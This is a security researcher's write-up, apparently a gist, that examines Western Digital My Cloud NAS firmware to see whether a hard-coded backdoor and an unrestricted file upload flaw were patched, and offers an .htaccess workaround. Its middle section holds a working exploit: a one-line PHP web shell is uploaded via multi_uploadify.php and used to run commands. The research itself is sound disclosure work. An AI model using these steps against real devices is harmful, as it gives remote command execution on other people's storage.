Investigating My Cloud vulnerabilities

mycloud-vulnerabilities.md

Description of vulnerabilities: WDMyCloud Multiple Vulnerabilities

• More details on unrestricted file upload vulnerability: https://www.exploitee.rs/index.php/Western_Digital_MyCloud#.2Fjquery.2Fuploader.2Fmulti_uploadify.php_.28added_08.2F06.2F2017.29
• Metasploit for file upload vulnerability: https://packetstormsecurity.com/files/145447/wd_mycloud_multiupload_upload.rb.txt

Update 2018-01-20

Both critical vulnerabilities (the hard-coded backdoor and the file upload vulnerability) have been corrected as of 2018-01-12 with the following firmwares:

My Cloud device	Firmware
Mirror	2.11.169
EX2	2.11.169
EX4	2.11.169
My Cloud	2.30.181
EX2 Ultra	2.30.181
Mirror Gen2	2.30.181
EX2100	2.30.181
EX4100	2.30.181
DL2100	2.30.181
DL4100	2.30.181
PR2100	2.30.181
PR4100	2.30.181

It appears that Western Digital simply removed the offending files from the firmware to correct the vulnerabilities:

wget http://download.wdc.com/nas/My_Cloud_BZVM_2.11.169.bin
binwalk -e My_Cloud_BZVM_2.11.169.bin

$ ls _My_Cloud_BZVM_2.11.169.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
ls: cannot access '_My_Cloud_BZVM_2.11.169.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php': No such file or directory

$ ls _My_Cloud_BZVM_2.11.169.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
ls: cannot access '_My_Cloud_BZVM_2.11.169.bin.extracted/squashfs-root/cgi/nas_sharing.cgi': No such file or directory

Workaround for file upload vulnerability

⚠️ I'm not sure what impact this workaround will have since I don't know what functionality uses multi_uploadify.php. The workaround can be removed by logging into your device and removing /var/www/.htaccess.

1. Set your My Cloud device IP

   mycloudip=192.168.0.1
   

2. Block multi_uploadify.php with an .htaccess file

   printf "RewriteRule ^web/jquery/uploader/multi_uploadify.php - [L,R=404]\n" > /tmp/.htaccess
   curl -v "http://$mycloudip/web/jquery/uploader/multi_uploadify.php?folder=/var/www/" -F "Filedata[]=@/tmp/.htaccess"
   

3. Verify multi_uploadify.php returns a 404 code

   $ curl -I "http://$mycloudip/web/jquery/uploader/multi_uploadify.php"
   HTTP/1.1 404 Not Found
   

My Cloud Mirror gen 1

Setup

sudo apt install binwalk

wget http://download.wdc.com/nas/My_Cloud_BZVM_2.11.164.bin
wget http://download.wdc.com/nas/My_Cloud_BZVM_2.11.168.bin

binwalk -e My_Cloud_BZVM_2.11.164.bin
binwalk -e My_Cloud_BZVM_2.11.168.bin

01 - Unrestricted file upload: vulnerability not remediated

$ diff _My_Cloud_BZVM_2.11.164.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
$

printf "<?php echo system(\$_GET['cmd']); ?>" > /tmp/phpshell.php
$ curl -v "http://192.168.0.1/web/jquery/uploader/multi_uploadify.php?folder=/var/www/" -F "Filedata[]=@/tmp/phpshell.php"
*   Trying 192.168.0.1...
* Connected to 192.168.0.1 (192.168.0.1) port 80 (#0)
> POST /web/jquery/uploader/multi_uploadify.php?folder=/var/www/ HTTP/1.1
> Host: 192.168.0.1
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 245
> Expect: 100-continue
> Content-Type: multipart/form-data; boundary=------------------------9bdc535de1b1c15e
> 
< HTTP/1.1 100 Continue
< HTTP/1.1 302 Found
< Date: Sun, 07 Jan 2018 20:18:43 GMT
< Server: Apache
< X-Powered-By: PHP/5.4.16
< Location: ?status=1
< Content-Length: 0
< Content-Type: text/html
< Content-Language: en
* HTTP error before end of send, stop sending
< 
* Closing connection 0

$ curl 'http://192.168.0.1/phpshell.php?cmd=ls%20%2F'
CacheVolume
bin
dev
etc
home
lib
linuxrc
lost+found
mnt
nfs
opt
proc
root
sbin
shares
sys
system
tmp
usr
var

02 - Hard coded backdoor: vulnerability remediated

$ ls _My_Cloud_BZVM_2.11.164.bin.extracted/squashfs-root/cgi/nas_sharing.cgi 
_My_Cloud_BZVM_2.11.164.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
$ ls _My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/cgi/nas_sharing.cgi 
ls: cannot access '_My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/cgi/nas_sharing.cgi': No such file or directory

My Cloud Mirror gen 2

Setup

wget http://download.wdc.com/nas/My_Cloud_BWVZ_2.30.165.bin
wget http://download.wdc.com/nas/My_Cloud_BWVZ_2.30.172.bin

binwalk -e My_Cloud_BWVZ_2.30.165.bin
binwalk -e My_Cloud_BWVZ_2.30.172.bin

01 - Unrestricted file upload: vulnerability appears to not be remediated

$ diff _My_Cloud_BWVZ_2.30.165.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BWVZ_2.30.172.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
$

02 - Hard coded backdoor: vulnerability remediated

$ ls _My_Cloud_BWVZ_2.30.165.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
_My_Cloud_BWVZ_2.30.165.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
$ ls _My_Cloud_BWVZ_2.30.172.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
ls: cannot access '_My_Cloud_BWVZ_2.30.172.bin.extracted/squashfs-root/cgi/nas_sharing.cgi': No such file or directory

My Cloud EX2 Ultra

Setup

wget http://download.wdc.com/nas/My_Cloud_BVBZ_2.30.165.bin
wget http://download.wdc.com/nas/My_Cloud_BVBZ_2.30.174.bin

binwalk -e My_Cloud_BVBZ_2.30.165.bin
binwalk -e My_Cloud_BVBZ_2.30.174.bin

01 - Unrestricted file upload: vulnerability appears to not be remediated

$ diff _My_Cloud_BVBZ_2.30.165.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
$

02 - Hard coded backdoor: vulnerability remediated

$ ls _My_Cloud_BVBZ_2.30.165.bin.extracted//squashfs-root/cgi/nas_sharing.cgi
_My_Cloud_BVBZ_2.30.165.bin.extracted//squashfs-root/cgi/nas_sharing.cgi
$ ls _My_Cloud_BVBZ_2.30.174.bin.extracted//squashfs-root/cgi/nas_sharing.cgi
ls: cannot access '_My_Cloud_BVBZ_2.30.174.bin.extracted//squashfs-root/cgi/nas_sharing.cgi': No such file or directory

Conclusion

The hard-coded backdoor vulnerability appears to have been remediated in the latest versions of My Cloud firmwares due to the file nas_sharing.cgi having been removed. However, I see no evidence that the unrestricted file upload vulnerability was remediated in any version of the My Cloud firmware. In particular, there have been no changes to the file multi_uploadify.php between any recent versions of the firwmare, and the file is identical between My_Cloud_BVBZ_2.30.165.bin (where GulfTech confirmed the vulnerability) and My_Cloud_BVBZ_2.30.174.bin (where the vulnerability was supposedly remediated):

$ diff -s _My_Cloud_BVBZ_2.30.165.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
Files _My_Cloud_BVBZ_2.30.165.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php and _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php are identical

I can confirm the unrestricted file upload vulnerability is present in firmware My_Cloud_BZVM_2.11.168.bin (see above), and multi_uploadify.php is also the same between that version and My_Cloud_BVBZ_2.30.174.bin:

$ diff -s _My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
Files _My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php and _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php are identical